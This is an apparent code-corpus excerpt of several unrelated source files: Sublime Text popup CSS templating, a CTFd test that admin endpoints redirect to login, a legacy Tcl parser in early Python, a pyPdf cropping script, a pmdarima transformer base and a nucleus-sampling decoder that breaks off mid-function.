re_valid_custom_scopes = re.compile(r'[a-zA-Z\d]+[a-zA-Z\d._\-]*')
re_missing_semi_colon = re.compile(r'(?<!;) \}')
re_base_colors = re.compile(r'^\s*\.(?:dummy)\s*\{([^}]+)\}', re.MULTILINE)
re_color = re.compile(r'(?<!-)(color\s*:\s*#[A-Fa-z\d]{6})')
re_bgcolor = re.compile(r'(?<!-)(background(?:-color)?\s*:\s*#[A-Fa-z\d]{6})')
re_pygments_selectors = re.compile(r'\.dummy (\.[a-zA-Z\d]+) ')
CODE_BLOCKS = '.mdpopups .highlight, .mdpopups .inline-highlight { %s; %s; }'
def fmt_float(f, p=0):
"""Set float precision and trim precision zeros."""
string = str(
decimal.Decimal(f).quantize(decimal.Decimal('0.' + ('0' * p) if p > 0 else '0'), decimal.ROUND_HALF_UP)
)
m = re_float_trim.match(string)
if m:
string = m.group('keep')
if m.group('keep2'):
string += m.group('keep2')
return string
class SchemeTemplate(object):
"""Determine color scheme colors and style for text in a Sublime view buffer."""
def __init__(self, scheme_file):
"""Initialize."""
self.scheme_file = scheme_file
self.css_type = INVALID
self.variable = {}
self.view = None
self.setup()
def guess_style(self, view, scope, selected=False, explicit_background=False):
"""Guess color."""
# Remove leading '.' to account for old style CSS class scopes.
if not NEW_SCHEMES:
return self.csm.guess_color(scope.lstrip('.'), selected, explicit_background)
else:
scope_style = view.style_for_scope(scope.lstrip('.'))
style = {}
style['foreground'] = scope_style['foreground']
style['background'] = scope_style.get('background')
style['bold'] = scope_style['bold']
style['italic'] = scope_style['italic']
defaults = view.style()
if not explicit_background and not style.get('background'):
style['background'] = defaults.get('background', '#FFFFFF')
if selected:
                sfg = scope_style.get('selection_foreground', defaults.get('selection_foreground'))
if sfg:
style['foreground'] = sfg
style['background'] = scope_style.get('selection', '#0000FF')
return style
def legacy_parse_global(self):
"""
Parse global settings.
LEGACY.
"""
self.csm = ColorSchemeMatcher(self.scheme_file)
# Get general theme colors from color scheme file
self.bground = self.csm.special_colors['background']['color_simulated']
rgba = RGBA(self.bground)
self.lums = rgba.get_true_luminance()
is_dark = self.lums <= LUM_MIDPOINT
self._variables = {
"is_dark": is_dark,
"is_light": not is_dark,
"sublime_version": int(sublime.version()),
"mdpopups_version": ver.version(),
"color_scheme": self.scheme_file,
"use_pygments": self.use_pygments,
"default_style": self.default_style
}
self.html_border = rgba.get_rgb()
self.fground = self.csm.special_colors['foreground']['color_simulated']
def get_variables(self):
"""Get variables."""
if NEW_SCHEMES:
is_dark = self.is_dark()
return {
"is_dark": is_dark,
"is_light": not is_dark,
"sublime_version": int(sublime.version()),
"mdpopups_version": ver.version(),
"color_scheme": self.scheme_file,
"use_pygments": self.use_pygments,
"default_style": self.default_style
}
else:
return self._variables
def get_html_border(self):
"""Get html border."""
return self.get_bg() if NEW_SCHEMES else self.html_border
def is_dark(self):
"""Check if scheme is dark."""
return self.get_lums() <= LUM_MIDPOINT
def get_lums(self):
"""Get luminance."""
if NEW_SCHEMES:
bg = self.get_bg()
rgba = RGBA(bg)
return rgba.get_true_luminance()
else:
return self.lums
def get_fg(self):
"""Get foreground."""
return self.view.style().get('foreground', '#000000') if NEW_SCHEMES else self.fground
def get_bg(self):
"""Get backtround."""
return self.view.style().get('background', '#FFFFFF') if NEW_SCHEMES else self.bground
def setup(self):
"""Setup the template environment."""
settings = sublime.load_settings("Preferences.sublime-settings")
self.use_pygments = not settings.get('mdpopups.use_sublime_highlighter', True)
self.default_style = settings.get('mdpopups.default_style', True)
if not NEW_SCHEMES:
self.legacy_parse_global()
# Create Jinja template
self.env = jinja2.Environment()
self.env.filters['css'] = self.retrieve_selector
self.env.filters['pygments'] = self.pygments
self.env.filters['foreground'] = self.to_fg
self.env.filters['background'] = self.to_bg
self.env.filters['brightness'] = self.brightness
self.env.filters['colorize'] = self.colorize
self.env.filters['hue'] = self.hue
self.env.filters['invert'] = self.invert
self.env.filters['saturation'] = self.saturation
self.env.filters['contrast'] = self.contrast
self.env.filters['grayscale'] = self.grayscale
self.env.filters['sepia'] = self.sepia
self.env.filters['fade'] = self.fade
self.env.filters['getcss'] = self.read_css
def read_css(self, css):
"""Read the CSS file."""
try:
var = copy.copy(self.variables)
var.update(
{
'is_phantom': self.css_type == PHANTOM,
'is_popup': self.css_type == POPUP
}
)
return self.env.from_string(
clean_css(sublime.load_resource(css))
).render(var=var, plugin=self.plugin_vars)
except Exception:
return ''
def fade(self, css, factor):
"""
Apply a fake transparency to color.
        Fake transparency is performed on top of the background color.
"""
try:
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
                rgba = RGBA(parts[1] + "%02x" % int(255.0 * max(min(float(factor), 1.0), 0.0)))
rgba.apply_alpha(self.get_bg())
return '%s: %s; ' % (parts[0], rgba.get_rgb())
except Exception:
pass
return css
def colorize(self, css, degree):
"""Colorize to the given hue."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.colorize(degree)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def hue(self, css, degree):
"""Shift hue."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.hue(degree)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def invert(self, css):
"""Invert color."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.invert()
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def contrast(self, css, factor):
"""Apply contrast filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.contrast(factor)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def saturation(self, css, factor):
"""Apply saturation filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.saturation(factor)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def grayscale(self, css):
"""Apply grayscale filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.grayscale()
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def sepia(self, css):
"""Apply sepia filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.sepia()
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def brightness(self, css, factor):
"""Adjust brightness."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.brightness(factor)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def to_fg(self, css):
"""Rename a CSS key value pair."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] == 'background-color':
parts[0] = 'color'
return '%s: %s; ' % (parts[0], parts[1])
return css
def to_bg(self, css):
"""Rename a CSS key value pair."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] == 'color':
parts[0] = 'background-color'
return '%s: %s; ' % (parts[0], parts[1])
return css
def pygments(self, style):
"""Get pygments style."""
return get_pygments(style)
def retrieve_selector(self, selector, key=None, explicit_background=True):
"""Get the CSS key, value pairs for a rule."""
if NEW_SCHEMES:
general = self.view.style()
fg = general.get('foreground', '#000000')
bg = general.get('background', '#ffffff')
scope = self.view.style_for_scope(selector)
style = []
if scope['bold']:
style.append('bold')
if scope['italic']:
style.append('italic')
color = scope.get('foreground', fg)
bgcolor = scope.get('background', (None if explicit_background else bg))
else:
scope = self.guess_style(self.view, selector, explicit_background=explicit_background)
color = scope.fg_simulated
bgcolor = scope.bg_simulated
style = scope.style.split(' ')
css = []
if color and (key is None or key == 'color'):
css.append('color: %s' % color)
if bgcolor and (key is None or key == 'background-color'):
css.append('background-color: %s' % bgcolor)
for s in style:
if "bold" in s and (key is None or key == 'font-weight'):
css.append('font-weight: bold')
if "italic" in s and (key is None or key == 'font-style'):
css.append('font-style: italic')
if "underline" in s and (key is None or key == 'text-decoration') and False: # disabled
css.append('text-decoration: underline')
text = ';'.join(css)
if text:
text += ';'
return text
def apply_template(self, view, css, css_type, template_vars=None):
"""Apply template to css."""
self.view = view
if css_type not in (POPUP, PHANTOM):
return ''
self.css_type = css_type
self.variables = self.get_variables()
var = copy.copy(self.variables)
if template_vars and isinstance(template_vars, (dict, OrderedDict)):
self.plugin_vars = copy.deepcopy(template_vars)
else:
self.plugin_vars = {}
var.update(
{
'is_phantom': self.css_type == PHANTOM,
'is_popup': self.css_type == POPUP
}
)
return self.env.from_string(css).render(var=var, plugin=self.plugin_vars)
def get_pygments(style):
"""
Get pygments style.
    Sublime CSS support is limited. It cannot handle well
things like: `.class1 .class2`, but it can handle things like:
`.class1.class2`. So we will not use things like `.highlight` in front.
We will first find {...} which has no syntax class. This will contain
our background and possibly foreground. If for whatever reason we
have no background or foreground, we will use `#000000` or `#ffffff`
respectively.
"""
try:
        # Let's see if we can find the pygments theme
text = HtmlFormatter(style=style).get_style_defs('.dummy')
text = re_missing_semi_colon.sub('; }', text)
except Exception:
return ''
bg = None
fg = None
# Find {...} which has no syntax classes
m = re_base_colors.search(text)
if m:
# Find background
m1 = re_bgcolor.search(m.group(1))
if m1:
# Use `background-color` as it works better
# with Sublime CSS
bg = m1.group(1).replace('background', 'background-color')
# Find foreground
m1 = re_color.search(m.group(1))
if m1:
fg = m1.group(1)
# Use defaults if None found
if bg is None:
bg = 'background-color: #ffffff'
if fg is None:
fg = 'color: #000000'
    # Reassemble, replacing the bare {...} rule with the .mdpopups .highlight, .inline-highlight rules.
# All other classes will be left bare with only their syntax class.
code_blocks = CODE_BLOCKS
if m:
css = clean_css(
(
text[:m.start(0)] +
(code_blocks % (bg, fg)) +
text[m.end(0):] +
'\n'
)
)
else:
css = clean_css(
(
(code_blocks % (bg, fg)) + '\n' + text + '\n'
)
)
return re_pygments_selectors.sub(r'.mdpopups .highlight \1', css)
|
tests/api/v1/user/test_admin_access.py | omertuc/CTFd | 3,592 | 12687968 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from tests.helpers import create_ctfd, destroy_ctfd, login_as_user, register_user
def test_api_hint_404():
"""Are admin protected resources accessible by admins/non-admins"""
app = create_ctfd()
endpoints = [
"/api/v1/configs/{}",
"/api/v1/challenges/types",
"/api/v1/statistics/teams",
"/api/v1/flags/{}",
"/api/v1/statistics/users/{}",
"/api/v1/configs",
"/api/v1/statistics/challenges/solves/percentages",
"/api/v1/statistics/scores/distribution",
"/api/v1/tags/{}",
"/api/v1/pages",
"/api/v1/files/{}",
"/api/v1/challenges/{}/tags",
"/api/v1/hints",
"/api/v1/challenges/{}/files",
"/api/v1/flags",
"/api/v1/submissions/{}",
"/api/v1/challenges/{}/flags",
"/api/v1/awards/{}",
"/api/v1/unlocks",
"/api/v1/challenges/{}/hints",
"/api/v1/statistics/submissions/{}",
"/api/v1/flags/types/{}",
"/api/v1/tags",
"/api/v1/statistics/challenges/{}",
"/api/v1/files",
"/api/v1/flags/types",
"/api/v1/submissions",
"/api/v1/pages/{}",
]
with app.app_context():
register_user(app)
client = login_as_user(app)
for endpoint in endpoints:
r = client.get(endpoint.format(1))
assert r.status_code == 302
assert r.location.startswith("http://localhost/login")
destroy_ctfd(app)
|
lib/TclUtil.py | aganders3/python-0.9.1 | 116 | 12687981 | # Utilities used by 'Tcl' emulator.
# Many functions in this file parse specific constructs from strings.
# In order to limit the number of slice operations (the strings can
# be very large), they always receive indices into the string that
# indicate the slice of the string that should be considered.
# The return value is in general another index, pointing to the first
# character in the string beyond the recognized construct.
# Errors are reported as exceptions (TclSyntaxError, TclMatchingError).
# A few functions have multiple return values.
# For efficiency, the Tcl "tokenizing" routines used pre-compiled
# regular expressions. This is less readable but should be much faster
# than scanning the string a character at a time.
#
# The global variables
# containing the compiled regexp's are named _foo_prog where foo is
# an indication of the function that uses them.
#
# The patterns always
# have the form <something>* so they always match at the start of the
# search buffer---maybe with the empty string. This makes it possible
# to use the expression "_foo_prog.exec(str, i)[0][1]" to find the first
# character beyond the matched string. Note that this may be beyond the
# end variable -- where this matters, "min(i, end)" is used.
# Constructs that cannot
# be recognized by a finite automaton (like matching braces) are scanned
# by a hybrid technique where the regular expression excludes the
# braces.
#
# Many regular expressions contain an expression that matches
# a Tcl backslash sequence as a subpart:
# \\\\C?M?(.|\n)
#
# This is a bit hard to
# read because the backslash contained in it must be doubled twice:
# once to get past Python's backslash mechanism, once to get past that
# of regular expressions. It uses (.|\n) to match absolutely
# *every character*, because the MULTILINE regular expression package does
# not accept '\n' as a match for '.'.
#
# There is also a simplification in the pattern for backslashes:
# *any* single character following a backslash is escaped,
# so hex and octal
# escapes are not scanned fully. The forms \Cx, \Mx and \CMx are
# scanned correctly, as these may hide a special character.
# (This does not invalidate the recognition of strings, although the
# match is effectuated in a different way than by the Backslash function.)
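# (Added illustration: in a pattern literal such as '\\\\C?M?(.|\n)', Python's
# string processing leaves \\C?M?(.|\n) for the regexp module, which then
# matches one literal backslash, an optional C and M, and any single character.)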
import regexp
# Exceptions raised for various error conditions.
TclAssertError = 'Tcl assert error'
TclSyntaxError = 'Tcl syntax error'
TclRuntimeError = 'Tcl runtime error'
TclMatchingError = 'Tcl matching error'
# Find a variable name.
# A variable name is either a (possiblly empty) sequence of letters,
# digits and underscores, or anything enclosed in matching braces.
# Return the index past the end of the name.
_varname_prog = regexp.compile('[a-zA-Z0-9_]*')
def FindVarName(str, i, end):
if i < end and str[i] = '{': return BalanceBraces(str, i, end)
i = _varname_prog.exec(str, i)[0][1]
return min(i, end)
# Split a list into its elements.
# Return a list of elements (strings).
def SplitList(str):
i, end = 0, len(str)
list = []
while 1:
i = SkipSpaces(str, i, end)
if i >= end: break
j = i
i = FindNextElement(str, i, end)
if str[j] = '{' and str[i-1] = '}':
element = str[j+1:i-1]
else:
element = Collapse(str[j:i])
list.append(element)
return list
# Find the next element from a list.
_element_prog = regexp.compile('([^ \t\n\\]+|\\\\C?M?(.|\n))*')
def FindNextElement(str, i, end):
if i < end and str[i] = '{':
i = BalanceBraces(str, i, end)
if i < end and str[i] not in ' \t\n':
raise TclSyntaxError, 'Garbage after } in list'
return i
i = _element_prog.exec(str, i)[0][1]
return min(i, end)
# Copy a string, expanding all backslash sequences.
_collapse_prog = regexp.compile('(\n|[^\\]+)*')
def Collapse(str):
if '\\' not in str: return str
i, end = 0, len(str)
result = ''
while i < end:
j = _collapse_prog.exec(str, i)[0][1]
j = min(j, end)
result = result + str[i:j]
if j >= end: break
c = str[j]
if c <> '\\': raise TclAssertError, 'collapse error'
x, i = Backslash(str, j, end)
result = result + x
return result
# Find the next full command.
# Return a list of begin, end indices of words in the string,
# and an index pointing just after the terminating newline or
# semicolon.
# Initial spaces are skipped.
# If the command begins with '#', it is considered empty and
# characters until '\n' are skipped.
_eol_prog = regexp.compile('[^\n]*')
def FindNextCommand(str, i, end, bracketed):
i = SkipSpaces(str, i, end)
if i >= end: return [], end
if str[i] = '#':
i = _eol_prog.exec(str, i)
i = min(i, end)
if i < end and str[i] = '\n': i = i+1
return [], i
if bracketed: terminators = [';']
else: terminators = [';', '\n']
list = []
while i < end:
j = FindNextWord(str, i, end)
word = str[i:j]
if word in terminators:
i = j
break
if word <> '\n': list.append(i, j)
i = SkipSpaces(str, j, end)
return list, i
# Find the next word of a command.
# Semicolon and newline terminate words but also count as a word
# themselves.
# The start index must point to the start of the word.
_word_prog = regexp.compile('([^ \t\n;[\\]+|\\\\C?M?(.|\n))*')
def FindNextWord(str, i, end):
if i >= end: return end
if str[i] in '{"':
if str[i] = '{': i = BalanceBraces(str, i, end)
else: i = BalanceQuotes(str, i, end)
if i >= end or str[i] in ' \t\n;': return min(i, end)
raise TclSyntaxError, 'Garbage after } or "'
begin = i
while i < end:
i = _word_prog.exec(str, i)[0][1]
if i >= end:
i = end
break
c = str[i]
if c in ' \t': break
if c in ';\n':
if i = begin: i = i+1
break
if c = '[': i = BalanceBrackets(str, i, end)
else: raise TclAssertError, 'word error'
return i
# Parse balanced brackets from str[i:end].
# str[i] must be '['.
# Returns end such that str[i:end] ends with ']'
# and contains balanced braces and brackets.
_brackets_prog = regexp.compile('([^][{\\]+|\n|\\\\C?M?(.|\n))*')
def BalanceBrackets(str, i, end):
if i >= end or str[i] <> '[':
raise TclAssertError, 'BalanceBrackets'
nesting = 0
while i < end:
i = _brackets_prog.exec(str, i)[0][1]
if i >= end: break
c = str[i]
if c = '{': i = BalanceBraces(str, i, end)
else:
i = i+1
if c = '[': nesting = nesting + 1
elif c = ']':
nesting = nesting - 1
if nesting = 0: return i
else: raise TclAssertError, 'brackets error'
raise TclMatchingError, 'Unmatched bracket ([)'
# Parse balanced braces from str[i:end].
# str[i] must be '{'.
# Returns end such that str[i:end] ends with '}'
# and contains balanced braces.
_braces_prog = regexp.compile('([^{}\\]+|\n|\\\\C?M?(.|\n))*')
def BalanceBraces(str, i, end):
if i >= end or str[i] <> '{':
raise TclAssertError, 'BalanceBraces'
nesting = 0
while i < end:
i = _braces_prog.exec(str, i)[0][1]
if i >= end: break
c = str[i]
i = i+1
if c = '{': nesting = nesting + 1
elif c = '}':
nesting = nesting - 1
if nesting = 0: return i
else: raise TclAssertError, 'braces error'
raise TclMatchingError, 'Unmatched brace ({)'
# Parse double quotes from str[i:end].
# str[i] must be '"'.
# Returns end such that str[i:end] ends with an unescaped '"'.
_quotes_prog = regexp.compile('([^"\\]+|\n|\\\\C?M?(.|\n))*')
def BalanceQuotes(str, i, end):
if i >= end or str[i] <> '"':
raise TclAssertError, 'BalanceQuotes'
i = _quotes_prog.exec(str, i+1)[0][1]
if i < end and str[i] = '"': return i+1
raise TclMatchingError, 'Unmatched quote (")'
# Static data used by Backslash()
_bstab = {}
_bstab['n'] = '\n'
_bstab['r'] = '\r'
_bstab['t'] = '\t'
_bstab['b'] = '\b'
_bstab['e'] = '\033'
_bstab['\n'] = ''
for c in ' {}[]$";\\': _bstab[c] = c
del c
# Backslash interpretation.
# First character must be a backslash.
# Return a pair (<replacement string>, <end of sequence>).
# Unrecognized or incomplete backslash sequences are not errors;
# this takes only the backslash itself off the string.
def Backslash(str, i, end):
if i >= end or str[i] <> '\\':
raise TclAssertError, 'Backslash'
i = i+1
if i = end: return '\\', i
c = str[i]
i = i+1
if _bstab.has_key(c): return _bstab[c], i
if c = 'C':
if i = end: return '\\', i-1
c = str[i]
i = i+1
if c = 'M':
if i = end: return '\\', i-2
c = str[i]
i = i+1
x = ord(c) % 040 + 0200
else:
x = ord(c) % 040
return chr(x), i
elif c = 'M':
if i = end: return '\\', i-1
c = str[i]
i = i+1
x = ord(c)
if x < 0200: x = x + 0200
return chr(x), i
elif c and c in '0123456789':
x = ord(c) - ord('0')
end = min(end, i+2)
while i < end:
c = str[i]
if c not in '0123456789': break
i = i+1
x = x*8 + ord(c) - ord('0')
		return chr(x), i
else:
# Not something that we recognize
return '\\', i-1
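# Illustrative example (not in the original source): Backslash('\\n rest', 0, 7)
# returns ('\n', 2), i.e. the two-character escape collapses to a newline and
# scanning resumes after it.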
# Skip over spaces and tabs (but not newlines).
_spaces_prog = regexp.compile('[ \t]*')
def SkipSpaces(str, i, end):
i = _spaces_prog.exec(str, i)[0][1]
return min(i, end)
# Concatenate the elements of a list with intervening spaces.
def Concat(argv):
result = ''
sep = ''
for arg in argv:
result = result + (sep + arg)
sep = ' '
return result
# Concatenate list elements, adding braces etc. to make them parseable
# again with SplitList.
def BuildList(argv):
result = ''
sep = ''
for arg in argv:
arg = AddBraces(arg)
result = result + (sep + arg)
sep = ' '
return result
# Add braces around a string if necessary to make it parseable by SplitList.
def AddBraces(str):
# Special case for empty string
if str = '': return '{}'
# See if it contains balanced braces
res = '{' + str + '}'
if TryNextElement(res):
# See if it would survive unquoted
# XXX should escape [] and $ as well???
if TryNextElement(str) and Collapse(str) = str: return str
# No -- return with added braces
return res
# Unbalanced braces. Add backslashes before suspect characters
res = ''
for c in str:
if c in '$\\[]{} ;': c = '\\' + c
elif c = '\n': c = '\\n'
elif c = '\t': c = '\\t'
res = res + c
return res
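# Illustrative example (not in the original source): AddBraces('a b') returns
# '{a b}' since the braced form survives re-parsing, whereas input containing
# unbalanced braces falls through to the backslash-escaping branch instead.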
def TryNextElement(str):
end = len(str)
try:
i = FindNextElement(str, 0, end)
return i = end
except (TclSyntaxError, TclMatchingError):
return 0
|
recipes/Python/576837_Crop_PDF_File_with_pyPdf/recipe-576837.py | tdiprima/code | 2,023 | 12687989 | <filename>recipes/Python/576837_Crop_PDF_File_with_pyPdf/recipe-576837.py
#! /usr/bin/python
# Originally found on http://www.mobileread.com/forums/showthread.php?t=25565
import getopt, sys
from pyPdf import PdfFileWriter, PdfFileReader
def usage ():
print """sjvr767\'s PDF Cropping Script.
Example:
my_pdf_crop.py -s -p 0.5 -i input.pdf -o output.pdf
my_pdf_crop.py --skip --percent 0.5 --input input.pdf --output output.pdf
\n
REQUIRED OPTIONS:
-p\t--percent
The factor by which to crop. Must be positive and less than or equal to 1.
-i\t--input
The path to the file to be cropped.
\n
OPTIONAL:
-s\t--skip
	Skip the first page. Output file will not contain the first page of the input file.
-o\t--output
Specify the name and path of the output file. If none specified, the script appends \'cropped\' to the file name.
-m\t--margin
Specify additional absolute cropping, for fine tuning results.
\t-m "left top right bottom"
"""
sys.exit(0)
def cut_length(dictionary, key, factor):
cut_factor = 1-factor
cut = float(dictionary[key])*cut_factor
cut = cut / 4
return cut
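# Illustrative example (not in the original script): for a 612 pt wide page and
# factor 0.8, cut_length(top_right, 'x', 0.8) gives 612 * (1 - 0.8) / 4 = 30.6,
# the amount later added to or subtracted from each corner coordinate.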
def new_coords(dictionary, key, cut, margin, code = "tl"):
if code == "tl":
if key == "x":
return abs(float(dictionary[key])+(cut+margin["l"]))
else:
return abs(float(dictionary[key])-(cut+margin["t"]))
elif code == "tr":
if key == "x":
return abs(float(dictionary[key])-(cut+margin["r"]))
else:
return abs(float(dictionary[key])-(cut+margin["t"]))
elif code == "bl":
if key == "x":
return abs(float(dictionary[key])+(cut+margin["l"]))
else:
return abs(float(dictionary[key])+(cut+margin["b"]))
else:
if key == "x":
return abs(float(dictionary[key])-(cut+margin["r"]))
else:
return abs(float(dictionary[key])+(cut+margin["b"]))
try:
opts, args = getopt.getopt(sys.argv[1:], "sp:i:o:m:", ["skip", "percent=", "input=", "output=", "margin="])
except getopt.GetoptError, err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
skipone = 0
for a in opts[:]:
if a[0] == '-s' or a[0]=='--skip':
skipone = 1
factor = 0.8 #default scaling factor
for a in opts[:]:
    if a[0] == '-p' or a[0]=='--percent':
if a[1] != None:
try:
factor = float(a[1])
except TypeError:
print "Factor must be a number."
sys.exit(2) #exit if no appropriate input file
input_file = None #no default input file
for a in opts[:]:
if a[0] == '-i' or a[0]=='--input':
if a[1] != None:
try:
if a[1][-4:]=='.pdf':
input_file = a[1]
else:
print "Input file must be a PDF."
sys.exit(2) #exit if no appropriate input file
except TypeError:
print "Input file must be a PDF."
sys.exit(2) #exit if no appropriate input file
except IndexError:
print "Input file must be a PDF."
sys.exit(2) #exit if no appropriate input file
else:
print "Please speicfy an input file."
sys.exit(2) #exit if no appropriate input file
output_file = "%s_cropped.pdf" %input_file[:-4] #default output
for a in opts[:]:
if a[0] == '-o' or a[0]=='--output':
if a[1]!= None:
try:
if a[1][-4:]=='.pdf':
output_file = a[1]
else:
print "Output file must be a PDF."
except TypeError:
print "Output file must be a PDF."
except IndexError:
print "Output file must be a PDF."
margin = {"l": 0, "t": 0, "r": 0, "b": 0}
for a in opts[:]:
if a[0] == '-m' or a[0]=='--margin':
if a[1]!= None:
m_temp = a[1].strip("\"").split()
margin["l"] = float(m_temp[0])
margin["t"] = float(m_temp[1])
margin["r"] = float(m_temp[2])
margin["b"] = float(m_temp[3])
else:
print "Error"
input1 = PdfFileReader(file(input_file, "rb"))
output = PdfFileWriter()
outputstream = file(output_file, "wb")
pages = input1.getNumPages()
top_right = {'x': input1.getPage(1).mediaBox.getUpperRight_x(), 'y': input1.getPage(1).mediaBox.getUpperRight_y()}
top_left = {'x': input1.getPage(1).mediaBox.getUpperLeft_x(), 'y': input1.getPage(1).mediaBox.getUpperLeft_y()}
bottom_right = {'x': input1.getPage(1).mediaBox.getLowerRight_x(), 'y': input1.getPage(1).mediaBox.getLowerRight_y()}
bottom_left = {'x': input1.getPage(1).mediaBox.getLowerLeft_x(), 'y': input1.getPage(1).mediaBox.getLowerLeft_y()}
print('Page dim.\t%f by %f' %(top_right['x'], top_right['y']))
cut = cut_length(top_right, 'x', factor)
new_tr = (new_coords(top_right, 'x', cut, margin, code = "tr"), new_coords(top_right, 'y', cut, margin, code = "tr"))
new_br = (new_coords(bottom_right, 'x', cut, margin, code = "br"), new_coords(bottom_right, 'y', cut, margin, code = "br" ))
new_tl = (new_coords(top_left, 'x', cut, margin, code = "tl"), new_coords(top_left, 'y', cut, margin, code = "tl"))
new_bl = (new_coords(bottom_left, 'x', cut, margin, code = "bl"), new_coords(bottom_left, 'y', cut, margin, code = "bl"))
if skipone == 0:
for i in range(0, pages):
page = input1.getPage(i)
page.mediaBox.upperLeft = new_tl
page.mediaBox.upperRight = new_tr
page.mediaBox.lowerLeft = new_bl
page.mediaBox.lowerRight = new_br
output.addPage(page)
else:
for i in range(1, pages):
page = input1.getPage(i)
page.mediaBox.upperLeft = new_tl
page.mediaBox.upperRight = new_tr
page.mediaBox.lowerLeft = new_bl
page.mediaBox.lowerRight = new_br
output.addPage(page)
output.write(outputstream)
outputstream.close()
|
pmdarima/preprocessing/endog/base.py | tuomijal/pmdarima | 736 | 12688013 | <reponame>tuomijal/pmdarima<filename>pmdarima/preprocessing/endog/base.py
# -*- coding: utf-8 -*-
import abc
from ..base import BaseTransformer
class BaseEndogTransformer(BaseTransformer, metaclass=abc.ABCMeta):
"""A base class for endogenous array transformers"""
def _check_y_X(self, y, X):
"""Check the endog and exog arrays"""
y, X = super(BaseEndogTransformer, self)._check_y_X(y, X)
if y is None:
raise ValueError("y must be non-None for endogenous transformers")
return y, X
@abc.abstractmethod
def inverse_transform(self, y, X=None, **kwargs): # TODO: remove kwargs
"""Inverse transform a transformed array
        Invert the transformation on the transformed array.
Parameters
----------
y : array-like or None, shape=(n_samples,)
The transformed endogenous (time-series) array.
X : array-like or None, shape=(n_samples, n_features), optional
The exogenous array of additional covariates. Not used for
endogenous transformers. Default is None, and non-None values will
serve as pass-through arrays.
Returns
-------
y : array-like or None
The inverse-transformed y array
X : array-like or None
The inverse-transformed exogenous array
"""
|
virtex/utils/nucleus_sampling.py | Muflhi01/virtex | 523 | 12688032 | <reponame>Muflhi01/virtex
r"""
Nucleus Sampling was introduced in the paper
`The Curious Case of Neural Text Degeneration <https://arxiv.org/abs/1904.09751>`_.
If you take it from here, make sure to cite them:
.. code-block:: text
@inproceedings{,
title={The Curious Case of Neural Text Degeneration},
author={<NAME> and <NAME> and <NAME> and <NAME> and <NAME>},
journal={ICLR},
year={2020}
}
Some core parts of this code are adapted with minor modifications from Thomas Wolf's
gist: https://gist.githubusercontent.com/thomwolf/1a5a29f6962089e871b94cbd09daf317
"""
from typing import Callable, List, Tuple
import torch
import torch.nn.functional as F
class AutoRegressiveNucleusSampling(object):
r"""
Implements the nucleus sampling for decoding captions. This class only works
for auto-regressive models (Transformer-like), not recurrent models (LSTM-like).
Args:
eos_index: The index of the end token (``[EOS]``) in vocabulary.
max_steps: The maximum number of decoding steps.
        nucleus_size: Cumulative probability mass (top-p) of the nucleus used for sampling.
"""
def __init__(
self,
eos_index: int,
max_steps: int = 50,
nucleus_size: float = 0.9,
):
super().__init__()
self._eos_index = eos_index
self.max_steps = max_steps
self.nucleus_size = nucleus_size
def search(
self, start_predictions: torch.Tensor, step: Callable[..., torch.Tensor]
) -> Tuple[torch.Tensor, None]:
batch_size = start_predictions.size()[0]
# List of `(batch_size, )` tensors. One for each timestep.
# This includes the start-of-sentence tokens, unlike the implementation
# in `AutoregressiveBeamSearch`. We will remove them in the end.
predictions: List[torch.Tensor] = [start_predictions]
for timestep in range(self.max_steps):
# Get the predictions from last timestep (most recent).
# shape: (batch_size, )
last_predictions = predictions[-1]
# If every predicted token from the last step is end-of-sentence token,
# then we can stop early.
if (last_predictions == self._eos_index).all():
break
# Combine step predictions made so far into one tensor. This is our
# "partial" caption input to the transformer.
# shape: (batch_size, timestep + 1)
predictions_so_far = torch.stack(predictions).permute(1, 0)
# Take a step, get the distribution of logits from next timestep.
# shape: (batch_size, num_classes)
current_logits = step(predictions_so_far)
# Sort logits in descending order to determine the nucleus.
sorted_logits, sorted_idx = torch.sort(current_logits, descending=True)
            # Get cumulative softmax probabilities. For every instance in batch, a
            # variable number of tokens (N) will constitute the nucleus.
# shape: (batch_size, num_classes)
cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Determine indices of tokens at the tail of distribution. These will be
# removed from the nucleus.
sorted_idx_to_remove = cumulative_probs > self.nucleus_size
# Shift the indices to the right to keep the first token outside nucleus.
sorted_idx_to_remove[..., 1:] = sorted_idx_to_remove[..., :-1].clone()
